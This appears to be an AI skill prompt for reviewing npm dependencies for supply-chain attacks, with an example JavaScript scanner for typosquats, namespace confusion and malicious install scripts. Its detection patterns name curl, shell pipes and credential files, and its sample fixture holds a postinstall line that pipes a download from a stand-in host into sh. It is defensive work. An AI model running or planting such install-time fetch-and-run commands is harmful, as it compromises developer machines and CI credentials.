supply-chain-security
Supply-Chain Security Scanner
This skill turns the model into a dependency reviewer. Read the manifests, lockfiles, install scripts, and the dependency diff; walk the detection passes; report each supply-chain risk with a severity and a concrete fix. No tools to install, no package to run, no registry to phone — the analysis is the model reading what's on disk and in the diff.
A dependency is the one thing in your project you didn't write and didn't review, running with your full privileges. The defender's problem is that it looks legitimate: the largest npm compromise in history rode chalk and debug (2 billion weekly downloads) through a phished maintainer, and the Shai-Hulud worm backdoored ~800 packages by republishing them under stolen tokens. Popularity is not safety. The moment to catch this is when a dependency is added or changed — that is what this skill reviews.
Mental model
A new or changed dependency runs code from a stranger twice: once at install time (lifecycle scripts — on your laptop and your CI runner, before a single line is reviewed) and again at runtime (in your app, your users' browsers, your servers). Two questions decide whether it is safe:
- Identity — is this the package you meant, published by whom you think published it? Defeated by typosquatting (a misspelling of a popular name), slopsquatting (a plausible name an AI hallucinated and an attacker pre-registered), dependency / namespace confusion (an internal name claimed on a public registry), and maintainer account takeover (a trusted name, a stolen token).
- Behavior — does it do something a library of its stated purpose has no reason to do? Especially at install time. Defeated by malicious lifecycle scripts, obfuscated payloads, credential harvesting, exfiltration, persistence, and self-propagation.
The install-time hook is the crown jewel. It executes before any code review, on developer machines and CI runners, with full environment and token access — which is exactly why every major worm (Shai-Hulud, the nx s1ngularity attack, the June 2026 binding.gyp campaign) targets install time. Most land in preinstall / postinstall; the binding.gyp worm bypasses those hooks entirely by tricking node-gyp into running arbitrary shell during a fake native build. A package can be perfectly functional and still own your machine the instant you install it.
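The two questions above, identity and behavior, can be mechanized as a first pass before a human (or the model) reads the diff. The block below is an added example, not part of this skill or any scanner project: it walks a constructed dependency diff, flags names within two edits of a popular package, internal scopes resolved from a public registry, lifecycle scripts with install-time download or decode patterns, and any binding.gyp that declares build actions or arrives in a package with no native-addon dependency. The diff shape (name to version/resolved/manifest/files), the popular-name list, the `@acme` scope, the internal registry URL and every package and script in it are assumptions constructed for the example.

```javascript
// Added example, not part of the skill text or any project: a minimal version of
// the identity and behavior passes, run over a dependency diff. The diff shape
// (name -> {version, resolved, manifest, files}), the popular-name list, the
// internal scope and every package/script below are constructed assumptions.
const LIFECYCLE = ['preinstall', 'install', 'postinstall']; // hooks npm runs for installed dependencies
const SUSPICIOUS = [ // [pattern, why it matters inside an install script]
  [/\bcurl\b|\bwget\b/, 'downloads content at install time'],
  [/\|\s*(ba)?sh\b/, 'pipes content into a shell'],
  [/base64/, 'decodes an encoded payload'],
  [/process\.env|\$\{?[A-Z_]*(TOKEN|SECRET|KEY)/, 'reads environment secrets'],
  [/\.npmrc|\.git-credentials|\.aws\//, 'touches credential files'],
];

// Plain Levenshtein distance; one or two edits from a popular name is the typosquat sweet spot.
function levenshtein(a, b) {
  const dp = Array.from({ length: a.length + 1 }, (_, i) => [i]);
  for (let j = 1; j <= b.length; j++) dp[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      dp[i][j] = Math.min(dp[i - 1][j] + 1, dp[i][j - 1] + 1, dp[i - 1][j - 1] + cost);
    }
  }
  return dp[a.length][b.length];
}

// Identity pass: is this the package we meant, fetched from where we expect it?
function identityFindings(name, resolved, ctx) {
  const out = [];
  const scope = name.startsWith('@') ? name.split('/')[0] : null;
  if (scope && ctx.internalScopes.includes(scope) && !resolved.startsWith(ctx.internalRegistry)) {
    out.push({ pkg: name, severity: 'critical', rule: 'namespace-confusion',
      detail: `${scope} is an internal scope but resolved from ${resolved}`,
      fix: `pin ${scope} to ${ctx.internalRegistry} in .npmrc` });
  }
  for (const popular of ctx.popularNames) {
    const d = levenshtein(name, popular);
    if (d > 0 && d <= 2 && !ctx.popularNames.includes(name)) {
      out.push({ pkg: name, severity: 'high', rule: 'typosquat-candidate',
        detail: `${name} is ${d} edit(s) away from ${popular}`,
        fix: `confirm the intended package; it is probably ${popular}` });
    }
  }
  return out;
}

// Behavior pass: lifecycle scripts and binding.gyp, the two install-time execution paths.
function behaviorFindings(name, pkg) {
  const out = [];
  const scripts = (pkg.manifest && pkg.manifest.scripts) || {};
  for (const hook of LIFECYCLE) {
    if (!scripts[hook]) continue;
    const why = SUSPICIOUS.filter(([re]) => re.test(scripts[hook])).map(([, w]) => w);
    out.push({ pkg: name, severity: why.length ? 'critical' : 'medium', rule: `lifecycle:${hook}`,
      detail: why.length ? `${hook} ${why.join('; ')}: ${scripts[hook]}` : `${hook} runs "${scripts[hook]}" on every install`,
      fix: why.length ? 'do not install; report to the registry' : 'read the script; use --ignore-scripts in CI' });
  }
  const gyp = pkg.files && pkg.files['binding.gyp'];
  if (gyp) {
    // gyp "actions"/"rules" entries are commands the node-gyp build executes (heuristic: flag any).
    const hasActions = /"(actions|rules)"\s*:/.test(gyp);
    const deps = Object.keys((pkg.manifest && pkg.manifest.dependencies) || {});
    const nativeDeps = deps.some(d => ['nan', 'node-addon-api', 'bindings'].includes(d));
    if (hasActions || !nativeDeps) {
      out.push({ pkg: name, severity: hasActions ? 'critical' : 'high', rule: 'binding.gyp',
        detail: hasActions ? 'binding.gyp declares build actions that the node-gyp build will execute as commands'
                           : 'binding.gyp present but no native-addon dependency declared',
        fix: 'inspect binding.gyp; install with --ignore-scripts until it is explained' });
    }
  }
  return out;
}

// Walk only packages that are new or changed between the two lockfile snapshots, worst severity first.
function scanDependencyDiff(before, after, ctx) {
  const findings = [];
  for (const [name, pkg] of Object.entries(after)) {
    if (before[name] && before[name].version === pkg.version) continue;
    findings.push(...identityFindings(name, pkg.resolved, ctx), ...behaviorFindings(name, pkg));
  }
  const rank = { critical: 0, high: 1, medium: 2 };
  return findings.sort((a, b) => rank[a.severity] - rank[b.severity]);
}

// Constructed sample diff: lodash unchanged, three new packages with distinct problems.
const CTX = { popularNames: ['lodash', 'chalk', 'debug', 'express'], internalScopes: ['@acme'],
              internalRegistry: 'https://npm.acme.internal/' };
const BEFORE = { lodash: { version: '4.17.21', resolved: 'https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz', manifest: {} } };
const AFTER = { ...BEFORE,
  lodahs: { version: '1.0.0', resolved: 'https://registry.npmjs.org/lodahs/-/lodahs-1.0.0.tgz',
    manifest: { scripts: { postinstall: 'curl -s http://example.invalid/i | sh' } } },
  '@acme/auth-client': { version: '2.1.0', resolved: 'https://registry.npmjs.org/@acme/auth-client/-/auth-client-2.1.0.tgz', manifest: {} },
  'fast-colorize': { version: '0.3.1', resolved: 'https://registry.npmjs.org/fast-colorize/-/fast-colorize-0.3.1.tgz',
    manifest: { scripts: { install: 'node-gyp rebuild' }, dependencies: {} },
    files: { 'binding.gyp': '{ "targets": [ { "target_name": "x", "actions": [ { "action_name": "fetch", "action": ["node", "scripts/fetch.js"] } ] } ] }' } },
};

for (const f of scanDependencyDiff(BEFORE, AFTER, CTX)) console.log(`[${f.severity}] ${f.pkg} ${f.rule}: ${f.detail} -> ${f.fix}`);
```

Run with `node` and it prints five findings, the three criticals first. The heuristics are deliberately loose: a two-edit name match and a binding.gyp without a native dependency will both produce false positives on legitimate packages, which is the trade the asymmetry argument in this skill accepts. Whatever the script flags still has to be read and explained by a reviewer; a clean run is not a clearance, since lockfile-only checks see nothing of what a package does at runtime.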
When you cannot confirm a package's identity, or cannot explain what its install script does, treat it as untrusted and flag it. The cost of a false positive is a held PR and a few minutes. The cost of a false negative is every credential on the machine and in CI — and your own packages republished as the next link in the worm. This asymmetry governs every judgment call below.